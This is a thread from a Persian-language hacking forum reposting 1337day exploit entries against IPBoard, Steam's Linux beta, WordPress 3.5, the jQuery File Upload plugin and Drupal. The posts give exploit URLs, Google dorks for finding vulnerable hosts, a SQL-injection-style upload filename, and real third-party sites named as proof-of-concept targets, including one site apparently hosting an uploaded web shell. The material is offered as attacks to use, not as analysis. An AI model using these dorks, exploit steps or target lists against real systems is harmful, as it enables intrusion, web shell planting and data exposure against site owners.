انجمن تیم امنیتی ایران سایبر

Private Exploits In 1337day

شروع موضوع توسط WH!T3 W01F ‏28/1/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    IPBoard 3.x.x/3.4 Full Path Disclosure

    IPBoard 3.x.x/3.4 Full Path Disclosure

    PHP:
    Exploit
    admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login 
      
    Dork
     
    in
    ****:Community Forum Software by IP.Board 
      
    Fix
     
    Turn off display_errors in php
    .ini  
      
    # 1337day.com [2012-12-12]
     
  2. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Steam Linux Closed Beta bypass authorization

    PHP:
    POC
    0x01 Download the steam client for linux herehttp://media.steampowered.com/client/installer/steam.deb 
     
     
    0x02 
    Login to your account using the Steam Client normally 
      
    0x03 
    There will be a MsgBox saying that you do not have authorization, Do not click OK, and normally use as if authorization  
      
    # 1337day.com [2012-12-12]
     
  3. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    WordPress 3.5 multiple path disclosure vulnerabilities

    WordPress 3.5 multiple path disclosure vulnerabilities

    PHP:
    # Exploit Title: wordpress 3.5 multiple path disclosure vulnerabilities  
    # Date: [12.12.12] 
    # Author: [Cyb3rboy] 
    # Vendor or Software Link: [wordpress.org] 
    # Version: [wordpress 3.5] 
    # Category:: [***apps] 
    # Google dork: [use brain ] 
    # Tested on: [windows] 
     
     
    the following directories is vulnerable to path disclosure vulnerability in word
    -press 3.5 
      
    /wp-settings.php 
    POC 
    :- http://sqayasia.com/wp-settings.php 
    http://www.way2blogging.org/wp-settings.php 
     
     
    /wp-includes/admin-bar.php 
    POC
    :- http://sqayasia.com/wp-includes/admin-bar.php 
    http://www.way2blogging.org/wp-includes/admin-bar.php 
     
     
      
    /wp-includes/author-template.php 
    Poc
    :- http://sqayasia.com/wp-includes/author-template.php 
    http://www.way2blogging.org/wp-includes/author-template.php 
     
     
    /wp-includes/canonical.php 
    Poc
    :- http://sqayasia.com/wp-includes/canonical.php 
     
     
    /wp-includes/category-template.php 
    Poc
    :- http://sqayasia.com/wp-includes/category-template.php 
    http://www.way2blogging.org/wp-includes/category-template.php 
     
     
    /wp-includes/class-wp-embed.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-embed.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/media.php 
    POc
    :- http://sqayasia.com/wp-includes/media.php 
     
     
    /wp-includes/ms-default-constants.php 
    Poc 
    :- http://sqayasia.com/wp-includes/ms-default-constants.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/ms-default-filters.php 
    Poc
    :- http://sqayasia.com/wp-includes/ms-default-filters.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/ms-settings.php 
    Poc
    :- http://sqayasia.com/wp-includes/ms-settings.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/post.php 
    Poc
    :- http://sqayasia.com/wp-includes/post.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/rss.php 
    Poc
    :- http://sqayasia.com/wp-includes/rss.php 
    http://www.way2blogging.org/wp-includes/rss.php 
     
     
    /wp-includes/user.php 
    Poc
    :- http://sqayasia.com/wp-includes/user.php 
    http://www.way2blogging.org/wp-includes/user.php 
     
     
    /wp-includes/theme.php 
    Poc
    :- http://sqayasia.com/wp-includes/theme.php 
    http://www.way2blogging.org/wp-includes/theme.php 
     
     
    /wp-includes/vars.php 
    Poc
    :- http://sqayasia.com/wp-includes/vars.php 
    http://www.way2blogging.org/wp-includes/vars.php 
     
     
    /wp-includes/class-wp-http-ixr-client.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php 
     
     
    /wp-includes/class-wp-image-editor-gd.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php 
    http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php 
     
     
    /wp-includes/class-wp-image-editor-imagick.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php 
    http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php 
     
     
    /wp-includes/class-wp-xmlrpc-server.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php 
    http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php 
     
     
    /wp-includes/class.wp-scripts.php 
    Poc
    :- http://sqayasia.com/wp-includes/class.wp-scripts.php 
    http://www.way2blogging.org/wp-includes/class.wp-scripts.php 
     
     
    /wp-includes/class.wp-styles.php 
    Poc
    :- http://sqayasia.com/wp-includes/class.wp-styles.php 
    http://www.way2blogging.org/wp-includes/class.wp-styles.php 
     
     
    /wp-includes/comment-template.php 
    Poc
    :- http://sqayasia.com/wp-includes/comment-template.php 
    http://www.way2blogging.org/wp-includes/comment-template.php 
     
     
    /wp-includes/default-filters.php 
    Poc
    :- http://sqayasia.com/wp-includes/default-filters.php 
    http://www.way2blogging.org/wp-includes/default-filters.php 
     
     
    /wp-includes/default-widgets.php 
    Poc
    :- http://sqayasia.com/wp-includes/default-widgets.php 
    http://www.way2blogging.org/wp-includes/default-widgets.php 
     
     
    /wp-includes/feed-atom-comments.php 
    Poc
    :- http://sqayasia.com/wp-includes/feed-atom-comments.php 
    http://www.way2blogging.org/wp-includes/feed-atom-comments.php 
     
     
    /wp-includes/feed-atom.php 
    Poc
    :- http://sqayasia.com/wp-includes/feed-atom.php 
    http://www.way2blogging.org/wp-includes/feed-atom.php 
     
     
    /wp-includes/feed-rdf.php 
    Poc
    :-http://sqayasia.com/wp-includes/feed-rdf.php 
    http://www.way2blogging.org/wp-includes/feed-rdf.php 
     
     
    /wp-includes/feed-rss.php 
    Poc
    :-http://sqayasia.com/wp-includes/feed-rss.php 
    http://www.way2blogging.org/wp-includes/feed-rss.php 
     
     
    /wp-includes/feed-rss2-comments.php 
    Poc
    :- http://sqayasia.com/wp-includes/feed-rss2-comments.php 
    http://www.way2blogging.org/wp-includes/feed-rss2-comments.php 
     
     
    /wp-includes/feed-rss2.php 
    Poc
    :- http://sqayasia.com/wp-includes/feed-rss2.php 
    http://www.way2blogging.org/wp-includes/feed-rss2.php 
     
     
    /wp-includes/functions.php 
    Poc
    :- http://sqayasia.com/wp-includes/functions.php 
    http://www.way2blogging.org/wp-includes/functions.php  
     
     
    # 1337day.com [2012-12-12]
    تشکر ها خیلی کمه :|
     
  4. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    0day jQuery File Upload Plugin Exploit Upload

    0day jQuery File Upload Plugin Exploit Upload
    PHP:
    Title0day jQuery File Upload Plugin Exploit Upload
    Description
    The Path /test has the Uploader and your files goes to /server/php/files/
    Date:06/01/2014
    Author
    Mauritania Attacker
    Dork1
    intitle:jQuery File Upload Plugin Test
    Dork2
    intitle:jQuery File Upload Demo
    Dork3
    inurl:/plugins/jquery-file-upload/server/php/
    Dork4inurl:/js/upload/server/php 
    Dork5
    inurl:/upload/server/php/files 
     
    POC
    www.restylesource.com/tempDirs/upload/test/
    Shellwww.restylesource.com/tempDirs/upload/server/php/files/priv8.php
    Default Shell Path:/php/files/shell.php
     
  5. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Drupal 6.x->7.18 getimagesize() Bug-0day

    Drupal 6.x->7.18 getimagesize() Bug-0day

    PHP:

        
    # < 02/01/2013 > #
     
        
        1
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
        0     _                   __           __       __                     1
        1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
        0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
        1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
        0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
        1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
        0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
        1                  \ \____/ >> Exploit database separated by exploit   0
        0                   \/___/          type (local, remote, DoS, etc.)    1
        1                                                                      1
        0  [+] Site            : 1337day.com                                   0
        1  [+] Support e-mail  : submit[at]1337day.com                         1
        0                                                                      0
        1               #########################################              1
        0               I'm KedAns-Dz member from Inj3ct0r Team                1
        1               #########################################              0
        0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
         
        ###
        # Title : Drupal 6.x->7.18 getimagesize() <= Multiple Vulnerabilities
        # Author : KedAns-Dz
        # E-mail : ked-h (@hotmail.com / @1337day.com)
        # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
        # Web Site : www.1337day.com .net .org
        # FaCeb0ok : http://fb.me/Inj3ct0rK3d
        # TwiTter : @kedans
        # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
        # Platform/CatID : php - remote - Multiple
        # Type : php - proof of concept - webapp 0day
        # Tested on : Windows7
        ###
         
        # <3 <3 Greetings t0 Palestine <3 <3
        # F-ck HaCking, Lov3 Explo8ting !
         
        ### [ Proof Images ] ####
        #
        # [1]> http://i45.tinypic.com/2a7tloz.jpg
        #
        # [2]> http://i50.tinypic.com/2repeyt.jpg
        #
        #########################
         
        ######## [ Proof / Exploit ] ################|=>
         
        ##################
        # [!] Description:
        ------------------
        This Bug in fonction ' getimagesize() ' is Multiple Vulnerabilities (in Drupal CMS),
        When you Upload NULL Image-Size the Script Can't Read the Image Content and show you
        some errors, The Attacker can use this bug to get some important information like SQL Info's
        or Disclosure the Full Path of drupal.
         
        ############################
        # [1] Full Path Disclosure :
        ----------------------------
        +> Go to add new Content/Article :
        ex : [ http://127.0.0.1/drupal-7.18/node/4#overlay=node/add/article ]
        and upload some NULL image (0 bytes), exn: [ UNION+SELECT+database()#.gif ] (with null content/bytes ok!)
        and Push UPLOAD ... you get error MSG like this ==>
         _________________________________________
        Notice: getimagesize(): Read error! in image_gd_get_info()
        (line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
        Notice: getimagesize(): Read error! in image_gd_get_info()
        (line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
         _________________________________________
         
        => in this error msg you can see/disclosure the Full Path ^_^ !, ( see the proof image )
         
        #################################
        # [2] Error Based SQL Injection :
        ---------------------------------
        +> The Same steps in the POC [1] , but just POST/Save the Content/Article
        and get this SQL Error MSG (ex:) =>
         __________________________________________________________
        Notice: getimagesize(): Read error! in image_gd_get_info() (line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
        PDOException: SQLSTATE[HY000]: General error: 1366 Incorrect integer value: '' for column 'field_image_width' at row 1: INSERT INTO {field_data_field_image}
        (entity_type, entity_id, revision_id, bundle, delta, language, field_image_fid, field_image_alt, field_image_title, field_image_width, field_image_height)
        VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5,
        :db_insert_placeholder_6, :db_insert_placeholder_7, :db_insert_placeholder_8, :db_insert_placeholder_9, :db_insert_placeholder_10);
        Array ( [:db_insert_placeholder_0] => node [:db_insert_placeholder_1] => 7 [:db_insert_placeholder_2] => 7 [:db_insert_placeholder_3] =>
        article [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => 5 [:db_insert_placeholder_7] => [:db_insert_placeholder_8]
        => [:db_insert_placeholder_9] => [:db_insert_placeholder_10] => ) in field_sql_storage_field_storage_write()
        (line 448 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\field\modules\field_sql_storage\field_sql_storage.module).
         ___________________________________________________________
         
        => you can see in this msg some SQL informations like (some columns name/content ) etc...
         
        #####
        # Happy neW Year 'All Elite Pene-Testers in ( 1337day & PacketStorm ) ^_^ Good Luck in 2013 <3
        #####
         
        #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
        # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
        # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
        # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
        # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
        # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
        # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
        # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
        #============================================================================================================

     
بارگذاری...
مطالب مشابه
  1. sajjadsotoudeh
    پاسخ ها:
    1
    دانلودها:
    960
  2. Sir.h4m1D
    پاسخ ها:
    0
    دانلودها:
    393
  3. Mkali07
    پاسخ ها:
    1
    دانلودها:
    929
  4. JOK3R
    پاسخ ها:
    0
    دانلودها:
    1,186
  5. MR.SHDOVV
    پاسخ ها:
    5
    دانلودها:
    1,252
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .